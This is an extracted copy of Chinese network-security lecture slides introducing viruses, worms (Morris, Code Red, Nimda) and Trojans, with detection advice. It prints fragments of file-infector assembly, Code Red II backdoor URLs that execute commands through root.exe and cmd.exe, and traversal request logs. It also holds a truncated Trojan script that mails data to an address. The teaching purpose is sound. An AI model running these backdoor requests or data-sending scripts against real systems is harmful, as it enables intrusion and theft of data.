計算機病毒、蠕蟲和特洛伊木馬介紹(網絡安全基礎課講義).ppt

《計算機病毒、蠕蟲和特洛伊木馬介紹(網絡安全基礎課講義).ppt》由會員分享，可在線閱讀，更多相關《計算機病毒、蠕蟲和特洛伊木馬介紹(網絡安全基礎課講義).ppt（44頁珍藏版）》請在裝配圖網上搜索。

計算機病毒、蠕蟲和特洛伊木馬,,提綱,計算機病毒網絡蠕蟲特洛伊木馬,計算機病毒,病毒結構模型病毒的分類引導型病毒文件型病毒宏病毒病毒舉例病毒防范,計算機病毒的結構,傳染條件判斷,傳染代碼,表現(xiàn)及破壞條件判斷,破壞代碼,傳染模塊,表現(xiàn)模塊,計算機病毒的分類,按攻擊平臺分類：DOS,Win32，MAC，Unix按危害分類：良性、惡性按代碼形式：源碼、中間代碼、目標碼按宿主分類：引導型主引導區(qū)操作系統(tǒng)引導區(qū)文件型操作系統(tǒng)應用程序宏病毒,引導型病毒—引導記錄,主引導記錄（MBR）,A,引導型病毒——系統(tǒng)引導過程,PowerOn,CPUsetuptofindafileINT21;findthehostfileMOVAX,3D02;setuptoopenthehostfileINT21;openhostfileMOVAH,40;setuptowritefiletodiskINT21;writetofileDB*.COM;whatfilestolookfor,宏病毒（MacroVirus）,歷史：1980年，Dr.FredrickCohenandRalfBurger論文1994年，MicrosoftWord第一例宏病毒Word,Excel,Access,PowerPoint,Project,LotusAmiPro,Visio,Lotus1-2-3,AutoCAD,CorelDraw.使用數(shù)據(jù)文件進行傳播，使得反病毒軟件不再只關注可執(zhí)行文件和引導區(qū)DOEViRT統(tǒng)計，85%的病毒感染歸因于宏病毒易于編寫，只需要一兩天的時間，10－15行代碼大量的用戶：90MillionMSOfficeUsers人們通常不交換程序，而交換數(shù)據(jù),宏病毒工作機理,,有毒文件.doc,Normal.dot,無毒文件.doc,Normal.dot,注意事項,Macro可以存在模板里，也可以存在文檔里RTF文件也可以包含宏病毒通過IE瀏覽器可以直接打開，而不提示下載,提綱,計算機病毒網絡蠕蟲特洛伊木馬,蠕蟲（Worm）,一個獨立的計算機程序，不需要宿主自我復制，自主傳播（Mobile）占用系統(tǒng)或網絡資源、破壞其他程序不偽裝成其他程序，靠自主傳播利用系統(tǒng)漏洞；利用電子郵件（無需用戶參與）,莫里斯蠕蟲事件,發(fā)生于1988年，當時導致大約6000臺機器癱瘓主要的攻擊方法Rsh，rexec：用戶的缺省認證Sendmail的debug模式Fingerd的緩沖區(qū)溢出口令猜測,CRI,主要影響WindowsNT系統(tǒng)和Windows2000主要影響國外網絡據(jù)CERT統(tǒng)計，至8月初已經感染超過25萬臺主要行為利用IIS的Index服務的緩沖區(qū)溢出缺陷進入系統(tǒng)檢查c:\notworm文件是否存在以判斷是否感染中文保護（是中文windows就不修改主頁）攻擊白宮！,CRII,InspiredbyRCI影響波及全球國內影響尤其廣泛主要行為所利用缺陷相同只感染windows2000系統(tǒng)，由于一些參數(shù)的問題，只會導致NT死機休眠與掃描：中文windows，600個線程,Nimda簡介,影響系統(tǒng)：MSwin9x,wind2k,winXP傳播途徑：Email、文件共享、頁面瀏覽、MSIIS目錄遍歷、CodeRed后門影響群發(fā)電子郵件，付病毒掃描共享文件夾，掃描有漏洞的IIS,掃描有CodeRed后門的IISServer,紅色代碼病毒,紅色代碼病毒是一種結合了病毒、木馬、DDOS機制的蠕蟲。2001年7月中旬，在美國等地大規(guī)模蔓延。2001年8月初，出現(xiàn)變種coderedII，針對中文版windows系統(tǒng)，國內大規(guī)模蔓延。通過80端口傳播。只存在與網絡服務器的內存，不通過文件載體。利用IIS緩沖區(qū)溢出漏洞（2001年6月18日發(fā)布）,CodeRedI,在侵入一臺服務器后，其運行步驟是：設置運行環(huán)境，修改堆棧指針，設置堆棧大小為218h字節(jié)。接著使用RVA（相對虛擬地址）查找GetProcAddress的函數(shù)地址，然后就獲得其他socket、connect、send、recv、closesocket等函數(shù)地址；如果C:\notworm在，不再進一步傳染；傳染其他主機。創(chuàng)造100個線程，其中99個用戶感染其他WEB服務器，被攻擊IP通過一個算法計算得出；篡改主頁，如果系統(tǒng)默認語言為“美國英語”，第100個進程就將這臺服務的主頁改成“Welcometo!,HackedByChinese!”，并持續(xù)10個小時。（這個修改直接在內存中修改，而不是修改*.htm文件）；如果時間在20：00UTC和23：59UTC之間，將反復和白宮主頁建立連接，并發(fā)送98k字節(jié)數(shù)據(jù)，形成DDOS攻擊。,CodeRedII,增加了特洛依木馬的功能，并針對中國網站做了改進計算IP的方法進行了修改，使病毒傳染的更快；檢查是否存在CodeRedII原子，若存在則進入睡眠狀態(tài)防止反復感染，若不存在則創(chuàng)建CodeRedII原子；創(chuàng)建300個線程進行傳染，若系統(tǒng)默認語言為簡體中文或繁體中文，則創(chuàng)建600個線程；檢查時間。病毒作者的意圖是傳播過程在2001年10月1日完成，之后，蠕蟲會爆發(fā)而使系統(tǒng)不斷重新啟動。在系統(tǒng)中安裝一個特洛依木馬：拷貝系統(tǒng)目錄cmd.exe到IIS的腳本執(zhí)行目錄下，改名為root.exe；將病毒體內的木馬解壓縮寫到C盤和D盤的explorer.exe木馬每次系統(tǒng)和啟動都會運行，禁止系統(tǒng)的文件保護功能，并將C盤和D盤通過web服務器共享,CodeRedII,攻擊形式http://x.x.x.x/c/inetpub/scripts/root.exe?/c+dirhttp://x.x.x.x/c/winnt/system32/cmd.exe?/c+dir其中x.x.x.x是被攻擊的IP地址，dir可以是任意命令，比如刪除系統(tǒng)中的文件，向外發(fā)送機密數(shù)據(jù)等，這個后門后來也成為了nimda病毒的一個傳播模式。下面是cert/cc上提供的被攻擊服務器日志(CA-2001-11)2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/../../winnt/system32/cmd.exe/c+dir200–2001-05-0612:20:1910.10.10.10-10.20.20.2080GET/scripts/../../winnt/system32/cmd.exe/c+dir+..\200–,紅色代碼病毒的檢測和防范,針對安裝IIS的windows系統(tǒng)；是否出現(xiàn)負載顯著增加（CPU/網絡）的現(xiàn)象；用netstat–an檢查是否有許多對外的80端口連接在web日志中檢查是否有/default.ida?xxx..%u0078%u0000％u00=aHTTP/1.0這樣的攻擊記錄；查找系統(tǒng)中是否存在文件c:\explorer.exe或d:\explorer.exe以及root.exe；檢查注冊表文件中是否增加了C和D虛擬目錄，以及文件保護功能是否被禁止。在任務管理器中檢查是否存在兩個explorer.exe進程。,提綱,計算機病毒網絡蠕蟲特洛伊木馬,特洛伊木馬,名字來源：古希臘故事通過偽裝成其他程序、有意隱藏自己惡意行為的程序，通常留下一個遠程控制的后門沒有自我復制的功能非自主傳播用戶主動發(fā)送給其他人放到網站上由用戶下載,最簡單的木馬舉例,ls#!/bin/sh/bin/mailmyaddress@

配套講稿：

如PPT文件的首頁顯示word圖標，表示該PPT已包含配套word講稿。雙擊word圖標可打開word文檔。

特殊限制：

部分文檔作品中含有的國旗、國徽等圖片，僅作為作品整體效果示例展示，禁止商用。設計者僅對作品中獨創(chuàng)性部分享有著作權。

關 鍵  詞：

計算機病毒 蠕蟲 特洛伊木馬 介紹 網絡安全 基礎課 講義